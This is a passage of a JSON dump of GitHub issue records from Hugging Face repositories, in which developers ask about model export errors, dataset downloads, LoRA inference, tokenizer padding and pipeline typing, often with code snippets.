Name:'/1/Expand' Status Message: invalid expand shape\r\n```\r\n\r\nIt seems like the model is not being properly converted. I'm currently trying to figure out why exactly.\r\n\r\n### Extra context:\r\n- This pr seems to have added support to sentence-transformers models, maybe something is missing: https://github.com/huggingface/optimum/pull/1589\r\n- To generate the runtime session error I used this script and changed the model names and exported model path: https://github.com/huggingface/optimum/issues/1519#issuecomment-1854780869\r\n- The same error occurs using node.js onnx runtime, so I assume the model is not exported properly.\r\n\r\n\r\n### Expected behavior\r\n\r\nThe model is exported properly and generates the same results as using Sentence transformers directly.", "url": "https://github.com/huggingface/optimum/issues/1621", "state": "closed", "labels": [ "bug" ], "created_at": "2024-01-02T12:08:07Z", "updated_at": "2024-01-12T15:26:21Z", "comments": 4, "user": "leodalcin" }, { "repo": "huggingface/alignment-handbook", "number": 87, "title": "How can I config `loss_type`?", "body": "I want to change the **loss_type** into KTO or something else to test but I can't. Please show me the way. Thank you.", "url": "https://github.com/huggingface/alignment-handbook/issues/87", "state": "closed", "labels": [], "created_at": "2024-01-02T11:54:34Z", "updated_at": "2024-01-10T13:41:19Z", "comments": 2, "user": "hahuyhoang411" }, { "repo": "huggingface/datasets", "number": 6548, "title": "Skip if a dataset has issues", "body": "### Describe the bug\n\nHello everyone,\r\nI'm using **load_datasets** from **huggingface** to download the datasets and I'm facing an issue, the download starts but it reaches some state and then fails with the following error:\r\nCouldn't reach https://huggingface.co/datasets/wikimedia/wikipedia/resolve/4cb9b0d719291f1a10f96f67d609c5d442980dc9/20231101.ext/train-00000-of-00001.parquet\r\n\r\nFailed to resolve \\'huggingface.co\\' ([Errno -3] Temporary failure in name resolution)\"))')))\r\n\r\n\r\n![image](https://github.com/huggingface/datasets/assets/143214684/8847d9cb-529e-4eda-9c76-282713dfa3af)\r\n\r\nso I was wondering is there a parameter to be passed to load_dataset() to skip files that can't be downloaded??\n\n### Steps to reproduce the bug\n\nParameter to be passed to load_dataset() of huggingface to skip files that can't be downloaded??\n\n### Expected behavior\n\nload_dataset() finishes without error\n\n### Environment info\n\nNone", "url": "https://github.com/huggingface/datasets/issues/6548", "state": "open", "labels": [], "created_at": "2023-12-31T12:41:26Z", "updated_at": "2024-01-02T10:33:17Z", "comments": 1, "user": "hadianasliwa" }, { "repo": "huggingface/transformers.js", "number": 491, "title": "Running tests locally fail", "body": "### Question\n\nWhen I git clone to my Mac, and run tests, I get a lot of errors:\r\n\r\n```\r\n \u25cf Models \u203a Loading different architecture types \u203a gpt2 (GPT2Model)\r\n\r\n Could not locate file: \"https://huggingface.co/gpt2/resolve/main/tokenizer_config.json\".\r\n\r\n 239 |\r\n 240 | const message = ERROR_MAPPING[status] ?? 
`Error (${status}) occurred while trying to load file`;\r\n > 241 | throw Error(`${message}: \"${remoteURL}\".`);\r\n | ^\r\n 242 | }\r\n 243 |\r\n 244 | class FileCache {\r\n\r\n at handleError (src/utils/hub.js:241:11)\r\n at getModelFile (src/utils/hub.js:474:24)\r\n at getModelJSON (src/utils/hub.js:575:18)\r\n at async Promise.all (index 1)\r\n at loadTokenizer (src/tokenizers.js:61:16)\r\n at Function.from_pretrained (src/tokenizers.js:2465:20)\r\n at Object. (tests/models.test.js:61:37)\r\n```\r\n\r\nAnd indeed, a lot of files don't actually exist, like in this case:\r\n\r\nhttps://huggingface.co/gpt2/resolve/main/tokenizer_config.json\r\n\r\nBut I don't see this in the logs for your github actions, so i am confused.", "url": "https://github.com/huggingface/transformers.js/issues/491", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-30T02:12:35Z", "updated_at": "2024-10-18T13:30:11Z", "user": "sroussey" }, { "repo": "huggingface/transformers.js", "number": 490, "title": "Is it possible to implement sentence splitting?", "body": "### Question\n\nCan this library be used to implement sentence splitting, possibly with tokenizers?", "url": "https://github.com/huggingface/transformers.js/issues/490", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-30T01:17:55Z", "updated_at": "2024-02-01T01:51:52Z", "user": "devfacet" }, { "repo": "huggingface/transformers.js", "number": 486, "title": "Output different from sentence transformers", "body": "### Question\n\nHello, i'm not sure if i'm doing something wrong, but the pooled outputs from sentence transformers and this library seem to be different.\r\nThe results are the same if I use `pooling: 'none'` in js and `output_value='token_embedding` in python.\r\nI've seen some other similar issues, but this seems to be a different problem.\r\n\r\n```js\r\nconst fs = require('fs');\r\nclass MyClassificationPipeline {\r\n static task = 'feature-extraction';\r\n static model = 'Xenova/distiluse-base-multilingual-cased-v2';\r\n static instance = null;\r\n\r\n static async getInstance(progress_callback = null) {\r\n if (this.instance === null) {\r\n // Dynamically import the Transformers.js library\r\n let { pipeline, env } = await import('@xenova/transformers');\r\n\r\n // NOTE: Uncomment this to change the cache directory\r\n // env.cacheDir = './.cache';\r\n\r\n this.instance = pipeline(this.task, this.model, { progress_callback, quantized: false });\r\n }\r\n\r\n return this.instance;\r\n }\r\n}\r\n\r\n// Comment out this line if you don't want to start loading the model as soon as the server starts.\r\n// If commented out, the model will be loaded when the first request is received (i.e,. 
lazily).\r\nMyClassificationPipeline.getInstance();\r\n\r\nasync function main() {\r\n const classifier = await MyClassificationPipeline.getInstance();\r\n const res = await classifier('This is an example sentence', { pooling: 'mean', normalize:false });\r\n fs.writeFileSync('./xenova-embedding.json', JSON.stringify(res.data, null, 2), 'utf-8');\r\n}\r\n\r\nmain();\r\n```\r\n\r\n```python\r\nimport json\r\nfrom sentence_transformers import SentenceTransformer\r\nmodel = SentenceTransformer('sentence-transformers/distiluse-base-multilingual-cased-v2')\r\nembedding = model.encode(\"This is an example sentence\")\r\n\r\nwith open('embeddings.json', 'w') as f:\r\n json.dump(embedding.tolist(), f)\r\n```\r\n\r\nAm i missing something?", "url": "https://github.com/huggingface/transformers.js/issues/486", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-29T10:15:07Z", "updated_at": "2024-01-02T12:20:17Z", "user": "leodalcin" }, { "repo": "huggingface/trl", "number": 1155, "title": "What is the best way for the inference process in LORA in PEFT approach", "body": "Here is the SFTtrainer method i used for finetuning mistral\r\n```\r\ntrainer = SFTTrainer(\r\n model=peft_model,\r\n train_dataset=data,\r\n peft_config=peft_config,\r\n dataset_text_field=\" column name\",\r\n max_seq_length=3000,\r\n tokenizer=tokenizer,\r\n args=training_arguments,\r\n packing=packing,\r\n)\r\ntrainer.train()\r\n```\r\nI found different mechanisms for the finetuned model inference after PEFT based LORA finetuning\r\n\r\nMethod - 1\r\n\r\nsave adapter after completing training and then merge with base model then use for inference\r\n```\r\ntrainer.model.save_pretrained(\"new_adapter_path\")\r\nfrom peft import PeftModel\r\nfinetuned_model = PeftModel.from_pretrained(base_model,\r\n new_adapter_path,\r\n torch_dtype=torch.float16,\r\n is_trainable=False,\r\n device_map=\"auto\"\r\n )\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n``` \r\n\r\nMethod - 2\r\n\r\nsave checkpoints during training and then use the checkpoint with the least loss\r\n```\r\nfrom peft import PeftModel\r\nfinetuned_model = PeftModel.from_pretrained(base_model,\r\n \"least loss checkpoint path\",\r\n torch_dtype=torch.float16,\r\n is_trainable=False,\r\n device_map=\"auto\"\r\n )\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n``` \r\nMethod - 3\r\n\r\nsame method with AutoPeftModelForCausalLM class \r\n```\r\nmodel = AutoPeftModelForCausalLM.from_pretrained(\r\n \"output directory checkpoint path\",\r\n low_cpu_mem_usage=True,\r\n return_dict=True,\r\n torch_dtype=torch.float16,\r\n device_map=\"cuda\")\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n```\r\nMethod-4\r\n\r\nAutoPeftModelForCausalLM class specifies the output folder without specifying a specific checkpoint\r\n```\r\ninstruction_tuned_model = AutoPeftModelForCausalLM.from_pretrained(\r\n training_args.output_dir,\r\n torch_dtype=torch.bfloat16,\r\n device_map = 'auto',\r\n trust_remote_code=True,\r\n)\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n```\r\nMethod-5\r\nAll the above methods without merging\r\n```\r\n#finetuned_model = finetuned_model.merge_and_unload()\r\n```\r\n\r\nWhich is the actual method I should follow for inference?\r\nand when to use which method over another?", "url": "https://github.com/huggingface/trl/issues/1155", "state": "closed", "labels": [], "created_at": "2023-12-29T09:51:23Z", "updated_at": "2024-02-10T15:05:12Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/peft", "number": 
1310, "title": "What is the best way for the inference process in LORA in PEFT approach", "body": "### Feature request\r\n\r\nWhat is the best way for the inference process in LORA in PEFT approach\r\n### Motivation\r\n\r\nWhat is the best way for the inference process in LORA in PEFT approach\r\n### Your contribution\r\n\r\nHere is the SFTtrainer method i used for finetuning mistral\r\n```\r\ntrainer = SFTTrainer(\r\n model=peft_model,\r\n train_dataset=data,\r\n peft_config=peft_config,\r\n dataset_text_field=\" column name\",\r\n max_seq_length=3000,\r\n tokenizer=tokenizer,\r\n args=training_arguments,\r\n packing=packing,\r\n)\r\ntrainer.train()\r\n```\r\nI found different mechanisms for the finetuned model inference after PEFT based LORA finetuning\r\n\r\nMethod - 1\r\n\r\nsave adapter after completing training and then merge with base model then use for inference\r\n```\r\ntrainer.model.save_pretrained(\"new_adapter_path\")\r\nfrom peft import PeftModel\r\nfinetuned_model = PeftModel.from_pretrained(base_model,\r\n new_adapter_path,\r\n torch_dtype=torch.float16,\r\n is_trainable=False,\r\n device_map=\"auto\"\r\n )\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n``` \r\n\r\nMethod - 2\r\n\r\nsave checkpoints during training and then use the checkpoint with the least loss\r\n```\r\nfrom peft import PeftModel\r\nfinetuned_model = PeftModel.from_pretrained(base_model,\r\n \"least loss checkpoint path\",\r\n torch_dtype=torch.float16,\r\n is_trainable=False,\r\n device_map=\"auto\"\r\n )\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n``` \r\nMethod - 3\r\n\r\nsame method with AutoPeftModelForCausalLM class \r\n```\r\nmodel = AutoPeftModelForCausalLM.from_pretrained(\r\n \"output directory checkpoint path\",\r\n low_cpu_mem_usage=True,\r\n return_dict=True,\r\n torch_dtype=torch.float16,\r\n device_map=\"cuda\")\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n```\r\nMethod-4\r\n\r\nAutoPeftModelForCausalLM class specifies the output folder without specifying a specific checkpoint\r\n```\r\ninstruction_tuned_model = AutoPeftModelForCausalLM.from_pretrained(\r\n training_args.output_dir,\r\n torch_dtype=torch.bfloat16,\r\n device_map = 'auto',\r\n trust_remote_code=True,\r\n)\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n```\r\nMethod-5\r\nAll the above methods without merging\r\n```\r\n#finetuned_model = finetuned_model.merge_and_unload()\r\n```\r\n\r\nWhich is the actual method I should follow for inference?\r\nand when to use which method over another?", "url": "https://github.com/huggingface/peft/issues/1310", "state": "closed", "labels": [], "created_at": "2023-12-29T09:49:55Z", "updated_at": "2024-01-02T15:31:23Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/datasets", "number": 6542, "title": "Datasets : wikipedia 20220301.en error ", "body": "### Describe the bug\n\nWhen I used load_dataset to download this data set, the following error occurred. The main problem was that the target data did not exist.\n\n### Steps to reproduce the bug\n\n1.I tried downloading directly.\r\n```python\r\nwiki_dataset = load_dataset(\"wikipedia\", \"20220301.en\")\r\n```\r\nAn exception occurred\r\n```\r\nMissingBeamOptions: Trying to generate a dataset using Apache Beam, yet no Beam Runner or PipelineOptions() has been provided in `load_dataset` or in the builder arguments. For big datasets it has to run on large-scale data processing tools like Dataflow, Spark, etc. 
More information about Apache Beam runners at https://beam.apache.org/documentation/runners/capability-matrix/\r\nIf you really want to run it locally because you feel like the Dataset is small enough, you can use the local beam runner called `DirectRunner` (you may run out of memory). \r\nExample of usage: \r\n\t`load_dataset('wikipedia', '20220301.en', beam_runner='DirectRunner')`\r\n```\r\n2.I modified the code as prompted.\r\n```python\r\nwiki_dataset = load_dataset('wikipedia', '20220301.en', beam_runner='DirectRunner')\r\n```\r\nAn exception occurred:\r\n```\r\nFileNotFoundError: Couldn't find file at https://dumps.wikimedia.org/enwiki/20220301/dumpstatus.json\r\n```\r\n\n\n### Expected behavior\n\nI searched in the parent directory of the corresponding URL, but there was no corresponding \"20220301\" directory.\r\nI really need this dataset and hope you can provide a download method.\n\n### Environment info\n\npython 3.8\r\ndatasets 2.16.0\r\napache-beam 2.52.0\r\ndill 0.3.7\r\n", "url": "https://github.com/huggingface/datasets/issues/6542", "state": "closed", "labels": [], "created_at": "2023-12-29T08:34:51Z", "updated_at": "2024-01-02T13:21:06Z", "comments": 2, "user": "ppx666" }, { "repo": "huggingface/diffusers", "number": 6384, "title": "How to map A1111 reference_only parameters into diffusers?", "body": "Thanks to the community for implementing the reference_only functionality from A1111, but how do the parameters correspond to each other? I have tried to reproduce the effect of the webui in the diffusers library, but I can't seem to do it. I'm using the StableDiffusionReferencePipeline community pipeline.\r\n\r\nMy questions are:\r\n1. Is reference_only in A1111 equivalent to reference_attn=True, reference_adain=False? \r\n![image](https://github.com/huggingface/diffusers/assets/26246545/634e1501-0ce2-4c19-909f-a59416ba4008)\r\n2. Some parameters in A1111, such as starting control step, seem to have no corresponding parameters in the pipeline.\r\n![image](https://github.com/huggingface/diffusers/assets/26246545/1992c9b3-8d9e-43ee-9ea2-df78f7f5f1b1)\r\n3. The style_fidelity in diffusers seems to have significant differences compared to style_fidelity in A1111.", "url": "https://github.com/huggingface/diffusers/issues/6384", "state": "closed", "labels": [ "stale" ], "created_at": "2023-12-29T08:16:15Z", "updated_at": "2024-01-28T15:29:43Z", "user": "Logos23333" }, { "repo": "huggingface/peft", "number": 1308, "title": "How to check the gradients of lora layers when training a peft model", "body": "### Feature request\n\nWhen I train a LoRA model like this\r\n```python\r\nmodel = get_peft_model(model, lora_config)\r\ntraining(model,data)\r\n```\r\nhow can I check the gradients of the LoRA layers of a `peft` model?\n\n### Motivation\n\ncheck gradients of lora layers from peft model during training\n\n### Your contribution\n\nni", "url": "https://github.com/huggingface/peft/issues/1308", "state": "closed", "labels": [], "created_at": "2023-12-29T04:26:10Z", "updated_at": "2024-01-05T04:55:41Z", "user": "stardusts-hj" }, { "repo": "huggingface/transformers.js", "number": 484, "title": "TypeScript Pipeline Types for different models?", "body": "### Question\n\nIs there a suggested way to get types for the different models?
Right now, after I create a pipeline, like one of the following:\r\n\r\n```\r\nconst segmenter = await pipeline('image-segmentation', 'Xenova/face-parsing');\r\n// or \r\nconst extractor = await pipeline(`feature-extraction`, `Xenova/UAE-Large-V1`, {\r\n quantized: true, // Set this to false to use the full (unquantized) model\r\n});\r\n```\r\n\r\nAll the methods and returned values are `(...args: any[]) => any`, so I'm finding it hard to work with the methods and returned values.\r\n\r\nI realize each model returns different outputs, and I'm fairly new to the whole conversion process, but are these types kept somewhere in the Python or the JSON files with the model that could be used as TypeScript types? \r\n\r\nIdeally `pipeline` would infer the types, but I'm also ok with importing (or generating the types myself) and using it as a generic:\r\n\r\n```\r\nconst whateve = pipeline(`task`, `model`)\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/484", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-28T21:16:05Z", "updated_at": "2024-01-02T15:08:47Z", "user": "wesbos" }, { "repo": "huggingface/optimum-neuron", "number": 395, "title": "How to use generate() with inputs_embeds", "body": "I hope this is the right place to ask this question. Let me know if I need to move to another repo.\r\n\r\nCurrently I'm using `NeuronModelForCausalLM`.\r\n\r\nI have a use case where I need to be able to do the following:\r\n\r\n1. Generate embedding tokens\r\n2. Modify embedding tokens\r\n3. Run inference from modified embedding tokens\r\n\r\nI am able to do steps 1 & 2 currently using the following:\r\n```\r\nfrom optimum.neuron import NeuronModelForCausalLM\r\n\r\nllama_model = NeuronModelForCausalLM.from_pretrained('aws-neuron/Llama-2-7b-chat-hf-seqlen-2048-bs-1')\r\n\r\nembedded_tokens = llama_model.model.chkpt_model.model.embed_tokens(token_ids)\r\n\r\n### Code to modify embedded_tokens\r\n```\r\n\r\nHowever, as far as I can tell, generation with these modified tokens is not possible with `llama_model.generate()`.\r\n\r\nWhen I use the 'inputs_embeds' keyword argument, and set `input_ids=None`, I get the following:\r\n```\r\nValueError: The following `model_kwargs` are not used by the model: ['inputs_embeds']\r\n```\r\n\r\nIf this is not possible with NeuronModelForCausalLM.generate() currently, is there a way to work around this manually? If so, could you provide an example?\r\n\r\nThanks very much for your help! ", "url": "https://github.com/huggingface/optimum-neuron/issues/395", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-28T18:28:28Z", "updated_at": "2024-10-31T08:04:57Z", "user": "liechtym" }, { "repo": "huggingface/transformers.js", "number": 483, "title": "Unrecognized token '<' when running", "body": "### Question\r\n\r\nI downloaded the react translation example. When I start the app everything seems to render fine, but as soon as I press translate, nothing happens and I get this error in the console on the browser: \r\n`Unhandled Promise Rejection: SyntaxError: JSON Parse error: Unrecognized token '<'`\r\n\r\nI've gotten this same issue trying to run other models, keeping things very basic as found here: https://huggingface.co/docs/transformers.js/pipelines\r\n\r\nUPDATE: This error only happens in Safari, but it works fine in Chrome.
\r\n\r\nIf I try to make the simplest example with react like in the tutorial link it fails in both chrome and safari", "url": "https://github.com/huggingface/transformers.js/issues/483", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-28T14:44:50Z", "updated_at": "2023-12-28T20:35:02Z", "user": "philg-204" }, { "repo": "huggingface/transformers.js", "number": 482, "title": "How tot get the same output as the python library for the Resnet Model ?", "body": "### Question\r\n\r\nHi,\r\nI am trying to translate a python script to use it in my node server. Currently, I spawn a process to execute the python code, but I would like to improve response time by using the transformers.js version.\r\n\r\nMy problem is that I don't have the same output with the two codes. \r\n\r\nThe python output is a vector of dimension 2048\r\nThe js output is a vector of dimension 1000\r\n\r\nIt seems that my code has a problem as soon as the ImageProcessor step because the `inputs` are not equal\r\n\r\n\r\nPython code : \r\n```python\r\nimport torch\r\nfrom transformers import logging\r\n\r\nlogging.set_verbosity_error()\r\n\r\nfrom PIL import Image\r\n\r\n\r\nclass ImgToVec:\r\n def __init__(self, pretrained_model=\"microsoft/resnet-50\"):\r\n from transformers import AutoImageProcessor, ResNetModel\r\n\r\n self.pretrained_model = pretrained_model\r\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n self.image_processor = AutoImageProcessor.from_pretrained(pretrained_model)\r\n self.model = ResNetModel.from_pretrained(pretrained_model).to(self.device)\r\n\r\n def get_embedding(self, file):\r\n im = Image.open(file)\r\n inputs = self.image_processor(im, return_tensors=\"pt\").to(self.device)\r\n\r\n print(f\"inputs : {inputs} dimensiosn : {inputs['pixel_values'].size()}\")\r\n with torch.no_grad():\r\n outputs = self.model(**inputs)\r\n return outputs.pooler_output[0, :, 0, 0].tolist()\r\n\r\n# https://cdn-lfs.huggingface.co/repos/cf/db/cfdbeec4acf4145f96e47e07a9e161cade4dbce7cfad3ba24765bf1713d53ef3/d65b6f72943d5e2d4f7e5e4dedfb93aea0fbbda140ae7c3ee772124b579e07c4?response-content-disposition=inline%3B+filename*%3DUTF-8%27%27football-match.jpg%3B+filename%3D%22football-match.jpg%22%3B&response-content-type=image%2Fjpeg&Expires=1704020059&Policy=eyJTdGF0ZW1lbnQiOlt7IkNvbmRpdGlvbiI6eyJEYXRlTGVzc1RoYW4iOnsiQVdTOkVwb2NoVGltZSI6MTcwNDAyMDA1OX19LCJSZXNvdXJjZSI6Imh0dHBzOi8vY2RuLWxmcy5odWdnaW5nZmFjZS5jby9yZXBvcy9jZi9kYi9jZmRiZWVjNGFjZjQxNDVmOTZlNDdlMDdhOWUxNjFjYWRlNGRiY2U3Y2ZhZDNiYTI0NzY1YmYxNzEzZDUzZWYzL2Q2NWI2ZjcyOTQzZDVlMmQ0ZjdlNWU0ZGVkZmI5M2FlYTBmYmJkYTE0MGFlN2MzZWU3NzIxMjRiNTc5ZTA3YzQ%7EcmVzcG9uc2UtY29udGVudC1kaXNwb3NpdGlvbj0qJnJlc3BvbnNlLWNvbnRlbnQtdHlwZT0qIn1dfQ__&Signature=kWwcSkWcf8K62Tgr57HYD5VObZuozl3Jf%7EHV5alcyRA-gvbREfzgjMKU9rVOc84r0uwo9d3f-si-PoJ3GdyB8WObJFJWF0nE9SX5C-f3Nookj4SWevcJkLNgF27KqUPMhWWZ8B3KjEDvcxPirjHfc4fv87-uM%7EQIuazixgu0i8lXpzeSyKdZGNIc3zUG-hDzU3EKCGBWbwnGG9Yq%7Evz%7Eit-vvYc7i1AoYTAteZUP1ngDdywjwNf6VvvGqmyBdMcwVDiA0ShwAhW9Z3mqt%7EVz6HaYipWejY0mWmyVhyCWFtJOe9yrk%7ETJKr5cOV3yq6sM0jSheh3GuSd%7E2qYzjBsDVQ__&Key-Pair-Id=KVTP0A1DKRTAX\r\n\r\nresult = ImgToVec(\"microsoft/resnet-50\").get_embedding(\"./football-match.jpg\")\r\n```\r\n\r\nMy JS code : \r\n```ts\r\nclass ImgToVec {\r\n public async getEmbedding(\r\n file: string,\r\n pretrainedModel = 'Xenova/resnet-50',\r\n ): Promise {\r\n const { ResNetForImageClassification, AutoProcessor, RawImage } =\r\n await import('@xenova/transformers');\r\n\r\n const model = await 
ResNetForImageClassification.from_pretrained(\r\n pretrainedModel,\r\n );\r\n const imageProcessor = await AutoProcessor.from_pretrained(pretrainedModel);\r\n\r\n const image = await RawImage.read(file);\r\n\r\n const inputs = await imageProcessor(image);\r\n\r\n const outputs = await model(inputs, { config: { embeddingSize: 2048 } });\r\n\r\n console.log('inputs', inputs);\r\n\r\n const embedding: number[] = outputs.data;\r\n\r\n return embedding;\r\n }\r\n}\r\n\r\nconst imgToVec = new ImgToVec();\r\n\r\n// https://cdn-lfs.huggingface.co/repos/cf/db/cfdbeec4acf4145f96e47e07a9e161cade4dbce7cfad3ba24765bf1713d53ef3/d65b6f72943d5e2d4f7e5e4dedfb93aea0fbbda140ae7c3ee772124b579e07c4?response-content-disposition=inline%3B+filename*%3DUTF-8%27%27football-match.jpg%3B+filename%3D%22football-match.jpg%22%3B&response-content-type=image%2Fjpeg&Expires=1704020059&Policy=eyJTdGF0ZW1lbnQiOlt7IkNvbmRpdGlvbiI6eyJEYXRlTGVzc1RoYW4iOnsiQVdTOkVwb2NoVGltZSI6MTcwNDAyMDA1OX19LCJSZXNvdXJjZSI6Imh0dHBzOi8vY2RuLWxmcy5odWdnaW5nZmFjZS5jby9yZXBvcy9jZi9kYi9jZmRiZWVjNGFjZjQxNDVmOTZlNDdlMDdhOWUxNjFjYWRlNGRiY2U3Y2ZhZDNiYTI0NzY1YmYxNzEzZDUzZWYzL2Q2NWI2ZjcyOTQzZDVlMmQ0ZjdlNWU0ZGVkZmI5M2FlYTBmYmJkYTE0MGFlN2MzZWU3NzIxMjRiNTc5ZTA3YzQ%7EcmVzcG9uc2UtY29udGVudC1kaXNwb3NpdGlvbj0qJnJlc3BvbnNlLWNvbnRlbnQtdHlwZT0qIn1dfQ__&Signature=kWwcSkWcf8K62Tgr57HYD5VObZuozl3Jf%7EHV5alcyRA-gvbREfzgjMKU9rVOc84r0uwo9d3f-si-PoJ3GdyB8WObJFJWF0nE9SX5C-f3Nookj4SWevcJkLNgF27KqUPMhWWZ8B3KjEDvcxPirjHfc4fv87-uM%7EQIuazixgu0i8lXpzeSyKdZGNIc3zUG-hDzU3EKCGBWbwnGG9Yq%7Evz%7Eit-vvYc7i1AoYTAteZUP1ngDdywjwNf6VvvGqmyBdMcwVDiA0ShwAhW9Z3mqt%7EVz6HaYipWejY0mWmyVhyCWFtJOe9yrk%7ETJKr5cOV3yq6sM0jSheh3GuSd%7E2qYzjBsDVQ__&Key-Pair-Id=KVTP0A1DKRTAX\r\nimgToVec.getEmbedding('./football-match.jpg').then((embedding) => {\r\n console.log(embedding);\r\n});\r\n\r\n```\r\n\r\nAny ideas how to solve my problem please ?", "url": "https://github.com/huggingface/transformers.js/issues/482", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-28T11:38:20Z", "updated_at": "2024-01-10T15:04:22Z", "user": "Spoutnik97" }, { "repo": "huggingface/diffusers", "number": 6370, "title": "How to use diffusers lora in the AUTOMATIC1111 ", "body": "Thanks for your great work, I use the train_text_to_image_lora_sdxl.py to train my custom dataset and get these output, And I get the good result. But I want to use the AUTOMATIC1111 to use the lora weight, I move the pytorch_lora_weights to the AUTOMATIC1111 lora folder But get the error report:`AssertionError: conversion failed: lora_unet_input_blocks_4_1_transformer_blocks_0_attn1_to_k_lora_A_weight. the model may not be trained by `sd-scripts``\r\n![image](https://github.com/huggingface/diffusers/assets/18145013/561a8450-af71-460f-a091-78eb96dcea20)\r\nhow can I do to convert the lora model weight to which format AUTOMATIC1111 can accpet.\r\n", "url": "https://github.com/huggingface/diffusers/issues/6370", "state": "closed", "labels": [], "created_at": "2023-12-28T06:17:19Z", "updated_at": "2024-01-02T13:38:26Z", "user": "chongxian" }, { "repo": "huggingface/computer-vision-course", "number": 163, "title": "How to include \"What you'll learn\" section for this course?", "body": "Hello everyone, \r\nOur PR for Fundamentals of Computer Vision was merged a few days back. After that, one thing we still need to acknowledge based on your [feedback](https://github.com/johko/computer-vision-course/issues/38#issuecomment-1764502604) on our chapter outline is building a demo using Gradio to give learners a taste of what they'll learn. 
One of our teammates, @aman06012003 , created a simple [Cat vs Dog classifier deployed it on Hugging face spaces](https://ak0601-cat-dog-classifier.hf.space/), which we want you to take a look at and give feedback.\r\n\r\nOnce the demo is finalized, there are two ways to include it, referring to the [Hugging Face Audio Course](https://huggingface.co/learn/audio-course/chapter0/introduction). One is to create a new .mdx file in our fundamentals folder. The other is to create a new chapter - Welcome to the course, where we add what you'll learn, community notes, etc. We are still determining the optimal path, so please guide us. \r\n\r\nTeam members - @seshu-pavan , @bellabf , @aman06012003 \r\nbcc - @MKhalusova @johko @merveenoyan @lunarflu \r\n\r\nBest, \r\nFundamentals team ", "url": "https://github.com/huggingface/computer-vision-course/issues/163", "state": "closed", "labels": [], "created_at": "2023-12-27T12:41:26Z", "updated_at": "2024-04-26T13:36:59Z", "user": "seshupavan" }, { "repo": "huggingface/transformers", "number": 28260, "title": "How to set pad_token of Llava for batched generation and training?", "body": "Hello, @younesbelkada I'm trying to use Llava for batched generation, using the default pad_token. here is the script:\r\n```python\r\nimport json\r\nfrom PIL import Image\r\nfrom transformers import AutoProcessor, LlavaForConditionalGeneration,AutoTokenizer\r\nfrom torch.utils.data import Dataset,DataLoader\r\nimport torch\r\nimport os\r\nfrom tqdm import tqdm\r\nDATA_ROOT = \"/mnt/gozhang/code/LLaVA/playground/data/eval/mm-vet\"\r\nprocessor = AutoProcessor.from_pretrained(\"/mnt/gozhang/ckpts/llava-1.5-7b-hf\")\r\ntokenizer = AutoTokenizer.from_pretrained(\"/mnt/gozhang/ckpts/llava-1.5-7b-hf\")\r\n\r\nclass MMVetDataset(Dataset):\r\n def __init__(self,data_root) -> None:\r\n super().__init__()\r\n self.data_root = data_root\r\n with open(os.path.join(data_root, \"mm-vet.json\"), \"r\") as f:\r\n data = json.load(f)\r\n self.data = [(k,v) for k,v in data.items()]\r\n def __len__(self):\r\n return len(self.data)\r\n\r\n def __getitem__(self, index):\r\n return {'id':self.data[index][0],\r\n 'image':os.path.join(self.data_root,'images',self.data[index][1]['imagename']),\r\n 'question':\"USER: \\n\"+self.data[index][1]['question']+\" ASSISTANT:\"}\r\n\r\ndef collator(batch):\r\n ids = [b['id'] for b in batch]\r\n questions = [b['question'] for b in batch]\r\n images = [Image.open(b['image']) for b in batch]\r\n inputs = processor(text=questions,images=images,return_tensors=\"pt\",padding=True)\r\n return ids,inputs\r\n\r\nmodel = LlavaForConditionalGeneration.from_pretrained(\"/mnt/gozhang/ckpts/llava-1.5-7b-hf\",torch_dtype=torch.float16)\r\nmodel.to('cuda')\r\n#model.to(torch.float16)\r\ndataset = MMVetDataset(DATA_ROOT)\r\ndataloader = DataLoader(dataset,batch_size=16,collate_fn=collator)\r\nresults = {}\r\nbar = tqdm(total=len(dataset))\r\nmodel.eval()\r\nwith torch.inference_mode():\r\n for ids, inputs in dataloader:\r\n inputs.to('cuda')\r\n inputs['pixel_values'] = inputs['pixel_values'].half()\r\n outputs = model.generate(**inputs,temperature=0.2,do_sample=True,max_new_tokens=1024,use_cache=True)\r\n input_token_len = inputs['input_ids'].shape[1]\r\n responses=tokenizer.batch_decode(outputs[:, input_token_len:], skip_special_tokens=True, clean_up_tokenization_spaces=False)\r\n for id,res in zip(ids,responses):\r\n results[id]=res\r\n bar.update(len(responses))\r\nwith open('mmvet_result.json','w') as f:\r\n json.dump(results,f,indent=4)\r\n```\r\nBut when 
generating the fifth batch, it reports `RuntimeError: probability tensor contains either inf, nan or element < 0`. Then I tried a different pad_token, setting `processor.tokenizer.pad_token = processor.tokenizer.unk_token` (following the raw llava codebase), or `processor.tokenizer.pad_token = processor.tokenizer.eos_token` (following the common setting), or `processor.tokenizer.pad_token = processor.tokenizer.bos_token` (following this [issue](https://discuss.huggingface.co/t/llama2-pad-token-for-batched-inference/48020)). And I found that only setting pad_token to eos_token avoids the error. \r\nI wonder what the effect of different pad_token choices is during batched generation, what the root cause of this error is, and how to set the correct pad_token for training the model?", "url": "https://github.com/huggingface/transformers/issues/28260", "state": "closed", "labels": [], "created_at": "2023-12-27T12:17:02Z", "updated_at": "2024-02-05T02:43:32Z", "user": "TideDra" }, { "repo": "huggingface/transformers", "number": 28259, "title": "How to add new merge rules in AutoTokenizer", "body": "### Model description\n\nI'm training a new tokenizer from llama2; however, it seems that the BPE tokenizer will clear the original \"vocab\" and \"merge\" dicts, and the training result is highly biased on my own dataset (about 6M C functions), with some ugly tokens.\r\n\r\nI wonder if it is possible to train a tokenizer from llama2 with the original \"vocab\" and \"merge\" dicts unchanged, only adding some new vocab and merge rules from our 